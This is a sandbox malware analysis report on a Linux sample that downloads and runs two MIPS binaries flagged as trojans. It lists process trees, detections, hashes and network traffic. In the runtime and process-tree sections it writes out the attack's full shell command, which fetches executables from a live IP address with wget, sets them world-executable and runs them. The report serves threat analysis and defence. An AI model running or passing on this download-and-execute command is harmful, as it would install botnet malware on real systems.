Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:	1562234
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus detection for dropped file

Manipulation of devices in /dev

Sample deletes itself

ELF contains segments with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562234
Start date and time:	2024-11-25 11:34:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxcmdlinecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal56.evad.lin@0/4@0/0

Warnings

Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://65.175.140.164/images/faith
VT rate limit hit for: http://65.175.140.164/images/zte

Runtime Messages

Command:	/bin/sh -c "cd /tmp; wget http:/65.175.140.164/images/faith;chmod 777 faith;./faith faith2;cd /tmp; wget http:/65.175.140.164/images/zte;chmod 777 zte;./zte faith2;"
PID:	6228
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	we gone now we gone now
Standard Error:	--2024-11-25 04:35:29-- http://65.175.140.164/images/faith Connecting to 65.175.140.164:80... connected. HTTP request sent, awaiting response... 200 OK Length: 69440 (68K) [text/plain] Saving to: faith 0K .......... .......... .......... .......... .......... 73% 123K 0s 50K .......... ....... 100% 526K=0.4s 2024-11-25 04:35:31 (154 KB/s) - faith saved [69440/69440] --2024-11-25 04:35:31-- http://65.175.140.164/images/zte Connecting to 65.175.140.164:80... connected. HTTP request sent, awaiting response... 200 OK Length: 68124 (67K) [text/plain] Saving to: zte 0K .......... .......... .......... .......... .......... 75% 123K 0s 50K .......... ...... 100% 557K=0.4s 2024-11-25 04:35:33 (153 KB/s) - zte saved [68124/68124]

Process Tree

system is lnxubuntu20

sh (PID: 6228, Parent: 6152, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cd /tmp; wget http://65.175.140.164/images/faith;chmod 777 faith;./faith faith2;cd /tmp; wget http://65.175.140.164/images/zte;chmod 777 zte;./zte faith2;"

sh New Fork (PID: 6229, Parent: 6228)

wget (PID: 6229, Parent: 6228, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://65.175.140.164/images/faith

sh New Fork (PID: 6251, Parent: 6228)

chmod (PID: 6251, Parent: 6228, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 faith

sh New Fork (PID: 6252, Parent: 6228)

faith (PID: 6252, Parent: 6228, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: ./faith faith2

faith New Fork (PID: 6254, Parent: 6252)

sh (PID: 6254, Parent: 6252, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c mount

sh New Fork (PID: 6260, Parent: 6254)

mount (PID: 6260, Parent: 6254, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount

faith New Fork (PID: 6262, Parent: 6252)

sh New Fork (PID: 6264, Parent: 6228)

wget (PID: 6264, Parent: 6228, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://65.175.140.164/images/zte

sh New Fork (PID: 6265, Parent: 6228)

chmod (PID: 6265, Parent: 6228, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 zte

sh New Fork (PID: 6266, Parent: 6228)

zte (PID: 6266, Parent: 6228, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: ./zte faith2

zte New Fork (PID: 6268, Parent: 6266)

sh (PID: 6268, Parent: 6266, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c mount

sh New Fork (PID: 6273, Parent: 6268)

mount (PID: 6273, Parent: 6268, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount

zte New Fork (PID: 6275, Parent: 6266)

dash New Fork (PID: 6232, Parent: 4331)

rm (PID: 6232, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq

dash New Fork (PID: 6233, Parent: 4331)

rm (PID: 6233, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq

cleanup

Stderr: --2024-11-25 04:35:29-- http://65.175.140.164/images/faithConnecting to 65.175.140.164:80... connected.HTTP request sent, awaiting response... 200 OKLength: 69440 (68K) [text/plain]Saving to: faith 0K .......... .......... .......... .......... .......... 73% 123K 0s 50K .......... ....... 100% 526K=0.4s2024-11-25 04:35:31 (154 KB/s) - faith saved [69440/69440]--2024-11-25 04:35:31-- http://65.175.140.164/images/zteConnecting to 65.175.140.164:80... connected.HTTP request sent, awaiting response... 200 OKLength: 68124 (67K) [text/plain]Saving to: zte 0K .......... .......... .......... .......... .......... 75% 123K 0s 50K .......... ...... 100% 557K=0.4s2024-11-25 04:35:33 (153 KB/s) - zte saved [68124/68124]: exit code = 0

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/faith (PID: 6252)	File: /tmp/faith			Jump to behavior
Source: /tmp/zte (PID: 6266)	File: /tmp/zte			Jump to behavior

Source: faith.12.dr	Dropped file: segment LOAD with 7.9127 entropy (max. 8.0)
Source: faith.12.dr	Dropped file: segment LOAD with 7.971 entropy (max. 8.0)
Source: zte.27.dr	Dropped file: segment LOAD with 7.9076 entropy (max. 8.0)
Source: zte.27.dr	Dropped file: segment LOAD with 7.9709 entropy (max. 8.0)

Source: /tmp/faith (PID: 6252)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mount (PID: 6260)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/zte (PID: 6266)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mount (PID: 6273)	Queries kernel information via 'uname':	Jump to behavior

Source: sh, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6262.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: sh, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6262.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp	Binary or memory string: U1!/etc/qemu-binfmt/mipsel
Source: sh, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6275.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6262.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel./faithfaith2SUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/usr/binCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./faith
Source: sh, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6275.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips./ztefaith2SUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./zte
Source: sh, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6275.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6275.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp	Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: sh, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6262.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	2 File and Directory Permissions Modification	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label
/tmp/zte	100%	Avira	PUA/AVF.Agent.jcccr
/tmp/faith	100%	Avira	LINUX/AVI.Agent.dqzbs
/tmp/faith	45%	ReversingLabs	Linux.Trojan.Multiverze
/tmp/zte	39%	ReversingLabs	Linux.Trojan.Generic

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://65.175.140.164/images/faith	100%	Avira URL Cloud	malware
http://65.175.140.164/images/zte	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://65.175.140.164/images/zte	false	Avira URL Cloud: malware	unknown
http://65.175.140.164/images/faith	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
65.175.140.164	unknown	United States	32448	METROCAST-1US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.171.230.55	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	pXdN91.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	bin.sh.elf	Get hash	malicious	Mirai	Browse
	bot.mips.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	wheiuwa4.elf	Get hash	malicious	Unknown	Browse
	wheiuwa4.elf	Get hash	malicious	Unknown	Browse
	x86.elf	Get hash	malicious	Unknown	Browse
	hidakibest.arm4.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	main_ppc.elf	Get hash	malicious	Mirai	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	boatnet.x86.elf	Get hash	malicious	Mirai	Browse
	i.elf	Get hash	malicious	Unknown	Browse
	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	pXdN91.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	Mozi.a.elf	Get hash	malicious	Unknown	Browse
	bin.sh.elf	Get hash	malicious	Mirai	Browse
	vqsjh4.elf	Get hash	malicious	Mirai	Browse
	vkjqpc.elf	Get hash	malicious	Unknown	Browse
	dwhdbg.elf	Get hash	malicious	Unknown	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse
91.189.91.42	boatnet.x86.elf	Get hash	malicious	Mirai	Browse
	i.elf	Get hash	malicious	Unknown	Browse
	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	pXdN91.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse
	Mozi.a.elf	Get hash	malicious	Unknown	Browse
	bin.sh.elf	Get hash	malicious	Mirai	Browse
	vqsjh4.elf	Get hash	malicious	Mirai	Browse
	vkjqpc.elf	Get hash	malicious	Unknown	Browse
	dwhdbg.elf	Get hash	malicious	Unknown	Browse
	sshd.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sshd.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	pXdN91.armv4l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	185.125.190.26
	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	91.189.91.42
	pXdN91.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	91.189.91.42
	Mozi.a.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	bin.sh.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	vqsjh4.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	vkjqpc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
AMAZON-02US	XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.228.81.39
	05.Unzipped.obfhotel22-11.js	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.48
	0a0#U00a0.js	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.48
	55876.exe	Get hash	malicious	Unknown	Browse	18.167.130.152
	55876.exe	Get hash	malicious	Unknown	Browse	18.167.130.152
	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	54.171.230.55
	pXdN91.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	54.171.230.55
	file (1).txt.bat	Get hash	malicious	Unknown	Browse	18.181.154.24
	startup.txt.bat	Get hash	malicious	Unknown	Browse	18.181.154.24
	run.txt.bat	Get hash	malicious	Unknown	Browse	18.181.154.24
INIT7CH	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	109.202.202.202
	pXdN91.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	109.202.202.202
	Mozi.a.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	bin.sh.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	vqsjh4.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	vkjqpc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	dwhdbg.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	sshd.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
METROCAST-1US	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	216.246.137.37
	xd.arm.elf	Get hash	malicious	Mirai	Browse	146.170.92.47
	arm4.elf	Get hash	malicious	Mirai	Browse	146.170.92.54
	splmips.elf	Get hash	malicious	Unknown	Browse	146.170.240.134
	bin.sh.elf	Get hash	malicious	Mirai	Browse	198.52.12.89
	na.elf	Get hash	malicious	Mirai, Moobot	Browse	209.196.172.120
	na.elf	Get hash	malicious	Mirai, Moobot	Browse	146.170.152.191
	BpcC8hBhCN.elf	Get hash	malicious	Mirai	Browse	209.196.172.130
	ExeFile (156).exe	Get hash	malicious	Emotet	Browse	24.233.112.152
	yHIoCL9LQV.elf	Get hash	malicious	Mirai	Browse	209.196.172.109

Process:	/tmp/zte
File Type:	data
Category:	dropped
Size (bytes):	2032
Entropy (8bit):	7.898146365833693
Encrypted:	false
SSDEEP:	48:wly78n0TXcoYtN2bDKEp37aHedWd8wL6Mf39s0Y3fSPK6Wzz2P:T78n0TMoYtqmEsGWdCMf39sPSSBo
MD5:	F98BD17A99449C1486AEAEA68578C612
SHA1:	2CDC1584DCCD70B5CF4E5784FD057363D7BD340C
SHA-256:	3640BBCC7F8E516C7FD2436587D9C3B81F17806E1A933452D684541AE1565D70
SHA-512:	E95CF094C91A27E50377246DDC91E4FEE8D0F33B8F03C691FF4246A63440A1C60A43D4DE2FFFD34232C1530C22925B13A755DC4CCBB4CC265C0D1420A1D8626C
Malicious:	true
Reputation:	low
Preview:	.1.>g.n.5....J.4.2?..p.8.......6.>...#.p-.rx......V\>9R.....&..0..S.(....nA.['.a}%..w..owX=..J... .+.}....G/m...Gc...yEs..J..5....o\|..h....W..:.lU/.....BG..F......5.1O0...B.:...`.~s.......Q......_..Z.8.....1.f.\&^.._.I!R#..3......,....r-.....0...{@..c....)[.....q...$...r.&Q....e.W$x.S.."-..;j.+N8... .Tq{.>nn..R.H..Y..R.3..^./..],..W...)....?...]u..Y6kP.u.....g.k.IH.r....O2.Y.([?....& R./......HTzFd.L....j(h...S{.s....{/.{...T>...Ul.Tx+\|..&.'...o.l[.'...<)....`.K..........mKj.3...}7W..L.......?Q..Ha_._.%.X\2t.i..B.4...I<....[.D.....m.,.N...l!..V.G.:.LL../t.s/]..1..^M....j...g.5x...d...TL....9..9.8.....W.....,l1..~.D(.~...=p.uN..=...7nc...+g(.(..l....s..'....cC.........&.;.`...m..\|.,.X..fl......<.gO3...x2.i..m....L...j..q.....z.......s...e4.[. Y....5e[H04.KAU.N`...d....$..}j\|A@.w.f...!...8.!.>...H+4.m..xa..!Yx.zT{...f...g~....>...$k...>z...G.....f....U..-.\|....=....f..s2.46....4.vb....*y..d...1M\|#.........Y...Y..jRT..#.0.......A.%.6..k_9

/tmp/faith

Download File

Process:	/usr/bin/wget
File Type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	69440
Entropy (8bit):	7.971760975190941
Encrypted:	false
SSDEEP:	1536:ZLAC/jpWMsTR732Om4H7JPoTFYWGO8qmAd9kJik+KOZJP5NLXFc:ZlsMsT8fhR8qmAd9ywKOZR596
MD5:	342432EBC4CAF520BA541C96916AF5FA
SHA1:	59757A3FCFAE595E5B3FB8D2E1CD0295B74B7E62
SHA-256:	FE5B23807C9EAE2B931F7D459D8B94EC2959B055BDDC55D027CC6883AFBBEACF
SHA-512:	B478988B3D83626F8D5C35D23560D7E0E368033DD0B35212E98DB0BEABF7E38D1101D42D81345188068A498FEABF2D8DE4FCDB6A7B3AAE370AF780D37685A271
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	low
Preview:	.ELF....................P.I.4...........4. ...................@...@..........................I...I....................{1wom.........R...R......_..........?.E.h;...#...3.FR..f....k.N.T.M..i.%0.Zb5.... >2../..Y...U4.K?..J....<$..C\|.-..=.z.^G......#...........h.iX..R...D.q......Hx.!....c.......ME=H.]........._.t_...r-.....9...+..G..5..,n............iLA....-.<....z.H..k..S..y.].;...T...u.en.+o...Q].k(.S...F.........[<...!R....e.s..,.1..._."....-)r...U..P<1....$,...........2.t.g=Z.e.s..)..+g........j@/..-........u....9.^..`..G..W...i2L.,.....K..,.k,..uk.....-..U..{&...wC~^...........E5"b^...Qj..#[....L.....V......i.Y6...+......3..`........H_Br.v...D[......$....h_.\|.....hx^..?h[z."3._..Z3..JD.Q5o..Z...3.IW..\...Te...,.>*...s.P...Dg.....v.x.r./.n......,d.../..Ew=.sTT.S..X...Z.\.m..,.?~...r../.D.~f]....N....^...v.T....$8)@..p.+f..I...........s...P.n@.)....]i.....$..{.2.ya[..Z...x\...M...1......3.9.P..B(S.P..H=....M.d2.rO..Ik...Q^.p:....w0.P..=..m}...7..

/tmp/zte

Download File

Process:	/usr/bin/wget
File Type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	68124
Entropy (8bit):	7.971780688637147
Encrypted:	false
SSDEEP:	1536:s8EOx2fIarFNWV0rr0SmDEccC5Bx2GBffwZwpwrVKfHc:stMvV0rrDmocJb84YZQwrVm8
MD5:	10115C0CF85C43E0C5B135EA8A3DA819
SHA1:	CFC5A275EA42697C8B03749438FE930E58D2088F
SHA-256:	616ABA5FC8F7C86E38390CE215A2C8BBF07310A809FFE14E3F1CD78A8715FE60
SHA-512:	7B5A577178D589444EC6401B66C3194DB11796916484164B662211E62340CE97C28137D2B22D902A1CE99AEEA1BE297DEF9DD142B75BE24656A97D18883817D0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	low
Preview:	.ELF.....................I....4.........4. .................@...@........(..................I...I.....D...D........B...1wom..........O...O........a.......?.E.h4...@b..) ..]..0.p$.rC./......S.o.].t"......{...R.%Y.6..J.L.bf.;....(..F........................Y.3.$.H.....W....?+.....A\..RT3.b..e...!..=z.0[..)..YR5...].i9.......EP6.........gsb.p'...............zz..E'.X&B..V.o^..g..o8.J.& .V..V>4..p.0.U"z7.f...q.^....%.w...........b~...!.[.q..6%_U... .......I.x4....k....I#k...n.....F.YK..5..;T.V.I..>..7.........$.eS....'......c..D...C.d...=.7...o..h..;.5'B..g+....(..^.}........9.(7u[r.A.J..5".:...O..j..;..%....s.*.g<.D."@.v.qb...Vu"..}...K..u..K8.(H..e.;S..1X.........[....P........e..S.95.D.Q.y...i6..V..Q.X.=...#..y..t%.3......;...s...j).P...b#.g...g....4..N`..}Y..^,nv.K..a..l}k_.J..h`Y~.\|.Rw<.......1..p....{#....7....c..b...kH.0..~..~...f.R.J.K.W..u.z>.Xmc....(_!?i"\|xO.@..O...k.0%..~..]{.b...&..:3XT..si.\|..fB.0....#.)..z_E.....Pi?.........

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 11:35:30.242252111 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:30.362452030 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:30.362723112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:30.365338087 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:30.484894991 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:30.749602079 CET	443	33606	54.171.230.55	192.168.2.23
Nov 25, 2024 11:35:30.749923944 CET	33606	443	192.168.2.23	54.171.230.55
Nov 25, 2024 11:35:30.869770050 CET	443	33606	54.171.230.55	192.168.2.23
Nov 25, 2024 11:35:31.545496941 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545507908 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545650959 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545739889 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545748949 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545763969 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545830011 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545839071 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545855045 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545869112 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545901060 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.545954943 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.545996904 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.665595055 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.665700912 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.665793896 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.665793896 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.669696093 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.669735909 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.669758081 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.669796944 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.718533993 CET	43928	443	192.168.2.23	91.189.91.42
Nov 25, 2024 11:35:31.747096062 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.747108936 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.747306108 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.747328997 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.751779079 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.751883984 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.751923084 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.759538889 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.759655952 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.759696007 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.767982006 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.768110037 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.768146038 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.776468992 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.776578903 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.776614904 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.784713984 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.784895897 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.784933090 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.793154001 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.793236017 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.793277025 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.801598072 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.801609993 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.801646948 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.801661968 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.809912920 CET	80	58728	65.175.140.164	192.168.2.23
Nov 25, 2024 11:35:31.809967041 CET	58728	80	192.168.2.23	65.175.140.164
Nov 25, 2024 11:35:31.810058117 CET	80	58728	65.175.140.164	192.168.2.23
